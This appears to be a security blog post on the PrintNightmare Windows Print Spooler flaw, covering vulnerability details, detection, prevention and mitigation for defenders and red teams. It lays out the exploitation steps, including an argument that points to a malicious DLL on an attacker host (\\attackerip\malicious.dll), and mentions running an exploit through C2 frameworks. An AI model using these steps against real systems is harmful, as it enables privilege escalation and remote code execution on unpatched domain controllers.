CVE-2021-1675 / CVE-2021-34527

Update:

Microsoft is also referring to PrintNightmare as CVE-2021-34527, describing CVE-2021-1675 a different vulnerability in RpcAddPrinterDriverEx that was patched in the June 8th update. CVE-2021-34527 remains unpatched at this time.


Background

Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370) recently posted details on a new vulnerablility affecting the Print Spooler service in Windows, leading to LPE and RCE. They also hinted at more Spooler vulnerabilities coming in this years BlackHat talk!

Vulnerability Breakdown

The RpcAddPrinterDriver function in the Print Spooler service allows users with certain privileges ( SeLoadDriverPrivilege), to add drivers to a remote Print Spooler.

Due to a logic flaw in the Print Spooler service, users without these permissions can still add a driver, which can result in LPE/RCE (execution of any DLL) on the affected machine running the Print Spooler service!

Argument a4 is user-controllable, allowing a normal user to bypass the security check call to ValidateObjectAccess and add a driver!

This means that any low-privilege user account in a domain could gain LPE/RCE on the Domain Controller if it was running the Print Spooler service!

When calling RpcAddPrinterDriver we supply a few arguments:

pDataFile = A.dll

pConfigFile = \\attackerip\malicious.dll

pDriverPath = C.dll

Spooler service will check to validate that pDataFile and pDriverPath are not UNC paths. It DOES allow pConfigFile to be a UNC path. If we set pConfigFile to an malicious DLL file on the network, Spooler will copy the malicious DLL file into C:\Windows\System32\spool\drivers\x64\3\malicious.dll

By calling RpcAddPrinterDriver once again, we can set pDataFile to the malicious DLL we copied in the previous call with the pConfigFile argument, and the driver will be loaded.

There may be a copy conflict during the second call so the exploit implementation may loop through to gather a list of valid drivers, or simply pick the first one in the list to replace.

Exploits

When exploiting this in customer environments during our red team engagements, I'd personally opt for the C# implementation, since you can use it with CS or other C2 frameworks using the execute-assembly equivalent.

Compatibility

Credits to @StanHacked

Detection

GossiTheDog/ThreatHunting
Tools for hunting for threats. Contribute to GossiTheDog/ThreatHunting development by creating an account on GitHub.

Prevention

Disable the Print Spooler service on any server in your environment that is not a print server or a Domain Controller.

Microsoft recommends disabling Print Spooler if the machine is not a print server or a Domain Controller.

Mitigation

CVE-2021-1675 was "patched" in the June 8th updates, but CVE-2021-34527 remains unpatched and the only known mitigation strategy is to:

Disable the Print Spooler Service (either command below)

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start " /t REG_DWORD /d "4" /f
Uninstall-WindowsFeature Print-Services
✌️

Please consider which machine(s) you are disabling Print Spooler on and if you will end up breaking printing in your environment!

More, more,  more!

Here are some other great reads and compilations about the PrintNightmare vulnerability:

Critical Vulnerability: PrintNightmare Exposes Windows Servers to Remote Code Execution
Huntress is aware of a critical remote code execution and local privilege escalation vulnerability known as PrintNightmare. This is a serious security flaw that affects many Windows servers.
Zero day for every supported Windows OS version in the wild — PrintNightmare
zhiniang peng tweeted out a proof of concept exploit and explainer recently, and then quickly deleted it. This exploit and discussion contained an unpatched zero day in all supported and Extended…
PrintNightmare, Critical Windows Print Spooler Vulnerability | CISA
(Updated July 1, 2021) See Microsoft’s new guidance for the Print spooler vulnerability (CVE-2021-34527) and apply the necessary workarounds.